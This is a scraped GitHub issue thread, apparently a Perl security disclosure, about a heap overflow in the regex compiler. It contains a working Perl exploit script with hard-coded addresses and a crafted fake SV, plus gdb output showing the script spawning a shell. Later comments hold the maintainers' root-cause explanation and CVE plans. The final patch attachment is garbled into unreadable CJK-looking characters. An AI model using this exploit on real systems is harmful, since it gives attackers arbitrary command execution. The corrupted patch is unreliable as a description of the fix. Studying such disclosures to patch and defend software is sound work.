'\\xcd\\xab\\x00\\x00\\x00\\x00\\x00\\x00'\u003cbr\u003e\nsub h2s {\u003cbr\u003e\n  my $h = shift;\u003cbr\u003e\n  my $sz = shift;\u003cbr\u003e\n  my $ret = '';\u003cbr\u003e\n  for (0..($sz - 1)) {\u003cbr\u003e\n  $ret .= sprintf(\"\\\\x%02x\", (($h 
\u0026gt;\u0026gt; (8 * $_)) \u0026amp; 0xff));\u003cbr\u003e\n  }\u003cbr\u003e\n  return $ret\u003cbr\u003e\n}\u003c/p\u003e\n\u003cp dir=\"auto\"\u003emy $cmd = 'gdb -x gdbcmd -q --args\u003cbr\u003e\n~/perl5/perlbrew/perls/perl-blead-debug/bin/perl -e ';\u003cbr\u003e\nmy $prefix = '\\'my $r = \"(?[(?x​:(?[\\\\\\\\a]))\\\\\\\\]X';\u003c/p\u003e\n\u003cp dir=\"auto\"\u003emy $addr = 0xbacbfc; # overwrite start addr\u003cbr\u003e\n  # search with​:\u003cbr\u003e\n  # (gdb) b regcomp.c​:13904\u003cbr\u003e\n  # (gdb) p s\u003cbr\u003e\n  # [CAUTION] must not contain ']' (0x5d)\u003cbr\u003e\n  #\u003cbr\u003e\nmy $addr_sv_any = $addr + 8 + 4 + 4 + 8;\u003cbr\u003e\nmy $addr_stash = $addr_sv_any + 8 + 8 + 8;\u003cbr\u003e\nmy $addr_stash_any = $addr_stash + 8 + 4 + 4;\u003cbr\u003e\nmy $addr_magic = $addr_stash + 8 + 4 + 4 + 8 + 8 + 20 + 8;\u003cbr\u003e\nmy $addr_mg_virtual = $addr_magic + 8 + 8 + 2 + 1 + 1 + 8 + 8 + 8;\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# $ nm /path/to/perl | grep Perl_eval_sv\u003cbr\u003e\nmy $addr_eval_sv = 0x46a576;\u003cbr\u003e\nmy $addr_system_sh = $addr_stash_any + 8 + 8;\u003c/p\u003e\n\u003cp dir=\"auto\"\u003emy $body = ''\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# sv($addr) obj\u003cbr\u003e\n. h2s($addr_sv_any, 8)\u003cbr\u003e\n. h2s(0x01, 4) # sv_refcnt\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# sv_flags\u003cbr\u003e\n# - SVt_PVMG || SVs_OBJECT : to call SvREFCNT_dec_NN at\u003cbr\u003e\ndo_clean_named_objs()\u003cbr\u003e\n# - SVf_POK || SVp_POK : to use as SVPV in eval_sv\u003cbr\u003e\n. h2s(0x104407, 4)\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# sv_u.svu_pv : ptr to \"system sh\"\u003cbr\u003e\n. h2s($addr_system_sh, 8)\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# any($addr_sv_any)\u003cbr\u003e\n. h2s($addr_stash, 8) # HV* xmg_stash\u003cbr\u003e\n. h2s($addr_magic, 8) # union _xmgu xmg_u (MAGIC* xmg_magic)\u003cbr\u003e\n. 
h2s(length(\"system sh\"), 8) # STRLEN xpv_cur\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e## xmg_stash($addr_stash)\u003cbr\u003e\n. h2s($addr_stash_any, 8) # sv_any\u003cbr\u003e\n. h2s(0x02, 4) # sv_refcnt (not 0x01​: SVt_PVHV can not\u003cbr\u003e\nbypass assertion in eval_sv)\u003cbr\u003e\n. h2s(0x0c, 4) # sv_flags (SVt_PVHV)\u003cbr\u003e\n## any($addr_stash_any)\u003cbr\u003e\n. h2s(0x00, 8) # HV* xmg_stash\u003cbr\u003e\n. h2s($addr_magic, 8) # union _xmgu xmg_u (MAGIC* xmg_magic)\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# $addr_system_sh\u003cbr\u003e\n. \"system sh\\\\x00\"\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e. \"A\" x 10 # padding\u003cbr\u003e\n. h2s($addr, 8) # OVERWRITE gvp (addr + 100)\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# xmg_magic($addr_magic)\u003cbr\u003e\n. h2s(0x00, 8) # MAGIC* mg_moremagic;\u003cbr\u003e\n#\u003cbr\u003e\n. h2s($addr_mg_virtual, 8) # MGVTBL* mg_virtual /* pointer to magic\u003cbr\u003e\nfunctions */\u003cbr\u003e\n#\u003cbr\u003e\n. h2s(0x00, 2) # U16 mg_private;\u003cbr\u003e\n. h2s(0x00, 1) # char mg_type;\u003cbr\u003e\n. h2s(0x00, 1) # U8 mg_flags;\u003cbr\u003e\n. h2s(0x00, 8) # SSize_t mg_len;\u003cbr\u003e\n. h2s(0x00, 8) # SV* mg_obj;\u003cbr\u003e\n. h2s(0x00, 8) # char* mg_ptr;\u003cbr\u003e\n#\u003cbr\u003e\n## mg_virual($addr_mg_virtual)\u003cbr\u003e\n. h2s(0x00, 8) # int (*svt_get) (pTHX_ SV *sv, MAGIC*\u003cbr\u003e\nmg);\u003cbr\u003e\n. h2s(0x00, 8) # int (*svt_set) (pTHX_ SV *sv, MAGIC*\u003cbr\u003e\nmg);\u003cbr\u003e\n. h2s(0x00, 8) # U32 (*svt_len) (pTHX_ SV *sv, MAGIC*\u003cbr\u003e\nmg);\u003cbr\u003e\n. h2s(0x00, 8) # int (*svt_clear)(pTHX_ SV *sv, MAGIC* mg);\u003cbr\u003e\n. h2s($addr_eval_sv, 8) # int (*svt_free) (pTHX_ SV *sv, MAGIC*\u003cbr\u003e\nmg);\u003cbr\u003e\n. '])'\u003cbr\u003e\n. \"B\" x 20 # control gvp allocation\u003cbr\u003e\n. '\"; qr/$r/\\'';\u003c/p\u003e\n\u003cp dir=\"auto\"\u003emy $payload = $prefix . $body;\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eprint $cmd . 
$payload . \"\\n\";\u003cbr\u003e\n```\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e- output\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e```\u003cbr\u003e\n[eiichi@​x1 exploit]$ cat gdbcmd\u003cbr\u003e\nb regcomp.c​:13904\u003cbr\u003e\nrun\u003cbr\u003e\nl\u003cbr\u003e\np s\u003cbr\u003e\ndis br 1\u003cbr\u003e\nc\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e[eiichi@​x1 exploit]$ gdb -x gdbcmd -q --args\u003cbr\u003e\n~/perl5/perlbrew/perls/perl-blead-debug/bin/perl -e 'my $r =\u003cbr\u003e\n\"(?[(?x​:(?[\\\\a]))\\\\]X\\x14\\xcc\\xba\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x07\\x44\\x10\\x00\\x4c\\xcc\\xba\\x00\\x00\\x00\\x00\\x00\\x2c\\xcc\\xba\\x00\\x00\\x00\\x00\\x00\\x68\\xcc\\xba\\x00\\x00\\x00\\x00\\x00\\x09\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x3c\\xcc\\xba\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x68\\xcc\\xba\\x00\\x00\\x00\\x00\\x00system\u003cbr\u003e\nsh\\x00AAAAAAAAAA\\xfc\\xcb\\xba\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x94\\xcc\\xba\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x76\\xa5\\x46\\x00\\x00\\x00\\x00\\x00])BBBBBBBBBBBBBBBBBBBB\";\u003cbr\u003e\nqr/$r/'\u003cbr\u003e\nReading symbols from\u003cbr\u003e\n/home/eiichi/perl5/perlbrew/perls/perl-blead-debug/bin/perl...done.\u003cbr\u003e\nBreakpoint 1 at 0x5395ed​: file regcomp.c, line 13904.\u003cbr\u003e\n[Thread debugging using libthread_db enabled]\u003cbr\u003e\nUsing host libthread_db library \"/lib64/libthread_db.so.1\".\u003cbr\u003e\nwarning​: Loadable section \".note.gnu.property\" outside of ELF segments\u003cbr\u003e\nwarning​: Loadable section \".note.gnu.property\" outside of ELF segments\u003cbr\u003e\nThe regex_sets 
feature is experimental in regex; marked by \u0026lt;-- HERE in\u003cbr\u003e\nm/(?[ \u0026lt;-- HERE (?x​:(?[\\a]))\\]X̺DL̺,̺h̺ \u0026lt;̺\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e  h̺system\u003cbr\u003e\nshAAAAAAAAAA?˺?̺v?F])BBBBBBBBBBBBBBBBBBBB/ at -e line 1.\u003cbr\u003e\nThe regex_sets feature is experimental in regex; marked by \u0026lt;-- HERE in\u003cbr\u003e\nm/(?[(?x​:(?[ \u0026lt;-- HERE \\a]))\\]X̺DL̺,̺h̺ \u0026lt;̺\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e  h̺system\u003cbr\u003e\nshAAAAAAAAAA?˺?̺v?F])BBBBBBBBBBBBBBBBBBBB/ at -e line 1.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eBreakpoint 1, S_regatom (pRExC_state=0x7fffffffcc80, flagp=0x7fffffffc220,\u003cbr\u003e\ndepth=4) at regcomp.c​:13904\u003cbr\u003e\n13904 *(s++) = (char) ender;\u003cbr\u003e\n13899 U8 * new_s = uvchr_to_utf8((U8*)s,\u003cbr\u003e\nender);\u003cbr\u003e\n13900 added_len = (char *) new_s - s;\u003cbr\u003e\n13901 s = (char *) new_s;\u003cbr\u003e\n13902 }\u003cbr\u003e\n13903 else {\u003cbr\u003e\n13904 *(s++) = (char) ender;\u003cbr\u003e\n13905 }\u003cbr\u003e\n13906 }\u003cbr\u003e\n13907 }\u003cbr\u003e\n13908 else if (LOC \u0026amp;\u0026amp;\u003cbr\u003e\nis_PROBLEMATIC_LOCALE_FOLD_cp(ender)) {\u003cbr\u003e\n$1 = 0xbacbfc \"\"\u003cbr\u003e\npanic​: reg_node overrun trying to emit 0, baccc0\u0026gt;=bacc14 at -e line 1.\u003cbr\u003e\nDetaching after fork from child process 12813.\u003cbr\u003e\nsh-4.4$ date\u003cbr\u003e\n2018年 9月 24日 月曜日 19​:11​:34 JST\u003cbr\u003e\n```\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e2018年9月24日(月) 15​:41 Tony Cook via RT \u0026lt;\u003cbr\u003e\nperl5-security-report-followup@​perl.org\u0026gt;​:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eOn Wed, 29 Aug 2018 23​:52​:16 -0700, public@​khwilliamson.com wrote​:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eOn 08/27/2018 07​:16 AM, Eiichi Tsukata wrote​:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eThe following code generates a 
regexp which executes arbitrary\u003cbr\u003e\ncommand\u003cbr\u003e\nduring global destruction.\u003cbr\u003e\nIt overwrites some SV pointer address to a crafted fake SV on\u003cbr\u003e\noverwritten heap which has the malicious svt_free(shell_code) on its\u003cbr\u003e\nmagic vtable.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eLimitations​:\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e- must set `execstack -s` to perl\u003cbr\u003e\n- require address leak(exact address of overwritten heap)\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp dir=\"auto\"\u003eShouldn't this be getting a CVE?\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp dir=\"auto\"\u003eI plan to request a CVE ID for this issue in the next couple of days.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIf anyway has already requested an ID, please let me know.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThanks,\u003cbr\u003e\nTony\u003c/p\u003e\n\u003c/blockquote\u003e","bodyVersion":"1f72860f62be80174c5a1e4b16b8b48d5ba09dd6d6a84cdbf9eade6f1f9abcf0","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097452","createdAt":"2018-09-24T10:26:38Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nod
es":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZgsd2zAAqTU0NDA5NzQ1Mg=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097453,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ1Mw==","body":"### From @khwilliamson\n\nOn 09/19/2018 06\u0026#8203;:28 PM\\, Tony Cook via RT wrote\u0026#8203;:\n\u003e On Wed\\, 15 Aug 2018 11\u0026#8203;:01\u0026#8203;:24 \\-0700\\, khw wrote\u0026#8203;:\n\u003e\u003e The cause is one branch during the parsing leaves the parse pointer\n\u003e\u003e positioned one too far\\, and that causes the backslash to be skipped\n\u003e\u003e during pass2\\, which causes a '\\]' to be treated as a metacharacter\n\u003e\u003e instead of a literal\\.\n\u003e\u003e\n\u003e\u003e The fix is to remove the single line that incorrectly increments the\n\u003e\u003e parse pointer\\.\n\u003e\u003e I don't know that this being an experimental feature has any bearing\n\u003e\u003e on it\\.\n\u003e\u003e\n\u003e\u003e There is another 
thing\\. The minus sign in this case could have been\n\u003e\u003e caught as incorrect\\. But the same out\\-of\\-bounds writes would occur if\n\u003e\u003e a '^' replaced the minus\\, and that would be a correct use\\.\n\u003e \n\u003e Could you please make patches against blead/maint\\-5\\.28/maint\\-5\\.26 for this?\n\u003e \n\u003e Thanks\\,\n\u003e Tony\n\u003e \n\nAttached","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/khwilliamson/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/khwilliamson\"\u003e@khwilliamson\u003c/a\u003e\u003c/h3\u003e\n\u003cp dir=\"auto\"\u003eOn 09/19/2018 06​:28 PM, Tony Cook via RT wrote​:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eOn Wed, 15 Aug 2018 11​:01​:24 -0700, khw wrote​:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eThe cause is one branch during the parsing leaves the parse pointer\u003cbr\u003e\npositioned one too far, and that causes the backslash to be skipped\u003cbr\u003e\nduring pass2, which causes a ']' to be treated as a metacharacter\u003cbr\u003e\ninstead of a literal.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe fix is to remove the single line that incorrectly increments the\u003cbr\u003e\nparse pointer.\u003cbr\u003e\nI don't know that this being an experimental feature has any bearing\u003cbr\u003e\non it.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThere is another thing. The minus sign in this case could have been\u003cbr\u003e\ncaught as incorrect. 
But the same out-of-bounds writes would occur if\u003cbr\u003e\na '^' replaced the minus, and that would be a correct use.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp dir=\"auto\"\u003eCould you please make patches against blead/maint-5.28/maint-5.26 for this?\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThanks,\u003cbr\u003e\nTony\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp dir=\"auto\"\u003eAttached\u003c/p\u003e","bodyVersion":"995f2a740595a2f93d62e695a796bc46ba643910146a42f2d1f1f4083669ded3","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097453","createdAt":"2018-09-24T18:01:56Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0
,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZgy-siAAqTU0NDA5NzQ1Mw=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097454,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ1NA==","body":"### From @khwilliamson\n\n\u003cdetails\u003e\u003csummary\u003e0242-PATCH-perl-133423-for-5.26-maint.patch\u003c/summary\u003e\n\n```diff\n䙲潭⁤昲㠵㡥愲㡥戲挷攰ち㑢搶愵敤㤵攴㜸㉦㠸㌳㌠䵯渠卥瀠ㄷ‰〺〰㨰〠㈰〱੆牯洺⁋慲氠坩汬楡浳潮‼歨着捰慮⹯牧㸊䑡瑥㨠䵯測′㐠卥瀠㈰ㄸ‱ㄺ㔴㨴ㄠⴰ㘰《卵扪散琺⁛偁呃䠠㈴㈯㈴㉝⁐䅔䍈㨠孰敲氠⌱㌳㐲㍝⁦潲‵⸲㘠浡楮琊ਭⴭਠ牥杣潭瀮挠†††簠ㄠⴊ⁴⽲支牥束浥獧⹴⁼‴‫⬫⬊′⁦楬敳⁣桡湧敤Ⱐ㐠楮獥牴楯湳⠫⤬‱⁤敬整楯渨⴩ਊ摩晦‭ⵧ楴⁡⽲敧捯浰⹣⁢⽲敧捯浰⹣੩湤數⁣愴㝤户㔷㌮⸴㌱〰㙥㠵㔠㄰〶㐴ਭⴭ⁡⽲敧捯浰⹣ਫ⬫⁢⽲敧捯浰⹣ੀ䀠ⴱ㔱〹ⰷ‫ㄵ㄰㤬㘠䁀⁲敤潟捵牣桡爺ਠ††††††††††剅硃彰慲獥⬫㬊††††††††††⁡獳敲琨啃䡁剁吨剅硃彰慲獥⤠㴽‧⤧⤻ਠਭ††††††††††剅硃彰慲獥⬫㬊††††††††††⁒䕸䍟晬慧猠㴠獡癥彦污杳㬊††††††††††⁧潴漠桡湤汥彯灥牡湤㬊††††††††⁽੤楦映ⴭ杩琠愯琯牥⽲敧彭敳朮琠戯琯牥⽲敧彭敳朮琊楮摥砠㌹捦捦㝤昱⸮搲㙡㝣慦㌷‱〰㘴㐊ⴭⴠ愯琯牥⽲敧彭敳朮琊⬫⬠戯琯牥⽲敧彭敳朮琊䁀‭㄰㘬㘠⬱〶ⰸ⁀䀠浹․桩杨彭楸敤彤楧楴‽\u2028❁✠汴‧〧⤠㼠✰✠㨠❁✻ਠ浹․捯汯湟桥砠㴠獰物湴映∥〲堢Ⱐ潲搨∺∩㬊礠⑴慢彨數‽⁳灲楮瑦•┰㉘∬牤⠢屴∩㬊 ⭭礠③畧ㄳ㌴㈳‽•⠿嬨㽞㨨㽛屜屸〰崩⥜屝屸〰簲孞幝屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰崩刮屜㘷〢㬊⬊‣⌊‣⌠䭥礭癡汵攠灡楲猠潦⁣潤支敲牯爠潦⁣潤攠瑨慴⁳桯畬搠桡癥⁦慴慬⁥牲潲献ਠ⌣ੀ䀠ⴲ㤰ⰶ‫㈹㈬㠠䁀礠䁤敡瑨‽ਠ‧⼨㽸浳楸瀩慢振✠㴾•∬ਠ‧⼨㽸硸砺慢挩⼧‽㸠∢Ⰺ†✯⠿㰽⼧‽㸠❓敱略湣攠⠿⸮⸠湯琠瑥牭楮慴敤⁻⍽⼨㼼㵻⍽⼧Ⱐ†††††††††††‣⁛灥牬‣ㄲ㠱㜰崊⬠∯③畧ㄳ㌴㈳⼢‽㸠≏灥牡湤⁷楴栠湯⁰牥捥摩湧灥牡瑯爠笣素洯⠿嬨㽞㨨㽛屜]⤩屜笣絝|㉛幞嵜砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸そ⥒⹜尶㜰⼢Ⰺ⬊ \u2029㬊 ⴭ ㈮ㄷ⸱ਊ\n```\n\u003c/details\u003e\n","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/khwilliamson/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" 
href=\"https://github.com/khwilliamson\"\u003e@khwilliamson\u003c/a\u003e\u003c/h3\u003e\n\u003cdetails\u003e\u003csummary\u003e0242-PATCH-perl-133423-for-5.26-maint.patch\u003c/summary\u003e\n\u003cdiv class=\"highlight highlight-source-diff notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"䙲潭⁤昲㠵㡥愲㡥戲挷攰ち㑢搶愵敤㤵攴㜸㉦㠸㌳㌠䵯渠卥瀠ㄷ‰〺〰㨰〠㈰〱੆牯洺⁋慲氠坩汬楡浳潮‼歨着捰慮⹯牧㸊䑡瑥㨠䵯測′㐠卥瀠㈰ㄸ‱ㄺ㔴㨴ㄠⴰ㘰《卵扪散琺⁛偁呃䠠㈴㈯㈴㉝⁐䅔䍈㨠孰敲氠⌱㌳㐲㍝⁦潲‵⸲㘠浡楮琊ਭⴭਠ牥杣潭瀮挠†††簠ㄠⴊ⁴⽲支牥束浥獧⹴⁼‴‫⬫⬊′⁦楬敳⁣桡湧敤Ⱐ㐠楮獥牴楯湳⠫⤬‱⁤敬整楯渨⴩ਊ摩晦‭ⵧ楴⁡⽲敧捯浰⹣⁢⽲敧捯浰⹣੩湤數⁣愴㝤户㔷㌮⸴㌱〰㙥㠵㔠㄰〶㐴ਭⴭ⁡⽲敧捯浰⹣ਫ⬫⁢⽲敧捯浰⹣ੀ䀠ⴱ㔱〹ⰷ‫ㄵ㄰㤬㘠䁀⁲敤潟捵牣桡爺ਠ††††††††††剅硃彰慲獥⬫㬊††††††††††⁡獳敲琨啃䡁剁吨剅硃彰慲獥⤠㴽‧⤧⤻ਠਭ††††††††††剅硃彰慲獥⬫㬊††††††††††⁒䕸䍟晬慧猠㴠獡癥彦污杳㬊††††††††††⁧潴漠桡湤汥彯灥牡湤㬊††††††††⁽੤楦映ⴭ杩琠愯琯牥⽲敧彭敳朮琠戯琯牥⽲敧彭敳朮琊楮摥砠㌹捦捦㝤昱⸮搲㙡㝣慦㌷‱〰㘴㐊ⴭⴠ愯琯牥⽲敧彭敳朮琊⬫⬠戯琯牥⽲敧彭敳朮琊䁀‭㄰㘬㘠⬱〶ⰸ⁀䀠浹․桩杨彭楸敤彤楧楴‽\u2028❁✠汴‧〧⤠㼠✰✠㨠❁✻ਠ浹․捯汯湟桥砠㴠獰物湴映∥〲堢Ⱐ潲搨∺∩㬊礠⑴慢彨數‽⁳灲楮瑦•┰㉘∬牤⠢屴∩㬊 ⭭礠③畧ㄳ㌴㈳‽•⠿嬨㽞㨨㽛屜屸〰崩⥜屝屸〰簲孞幝屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰崩刮屜㘷〢㬊⬊‣⌊‣⌠䭥礭癡汵攠灡楲猠潦⁣潤支敲牯爠潦⁣潤攠瑨慴⁳桯畬搠桡癥⁦慴慬⁥牲潲献ਠ⌣ੀ䀠ⴲ㤰ⰶ‫㈹㈬㠠䁀礠䁤敡瑨‽ਠ‧⼨㽸浳楸瀩慢振✠㴾•∬ਠ‧⼨㽸硸砺慢挩⼧‽㸠∢Ⰺ†✯⠿㰽⼧‽㸠❓敱略湣攠⠿⸮⸠湯琠瑥牭楮慴敤⁻⍽⼨㼼㵻⍽⼧Ⱐ†††††††††††‣⁛灥牬‣ㄲ㠱㜰崊⬠∯③畧ㄳ㌴㈳⼢‽㸠≏灥牡湤⁷楴栠湯⁰牥捥摩湧灥牡瑯爠笣素洯⠿嬨㽞㨨㽛屜]⤩屜笣絝|㉛幞嵜砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸そ⥒⹜尶㜰⼢Ⰺ⬊ \u2029㬊 ⴭ ㈮ㄷ⸱ਊ\"\u003e\u003cpre 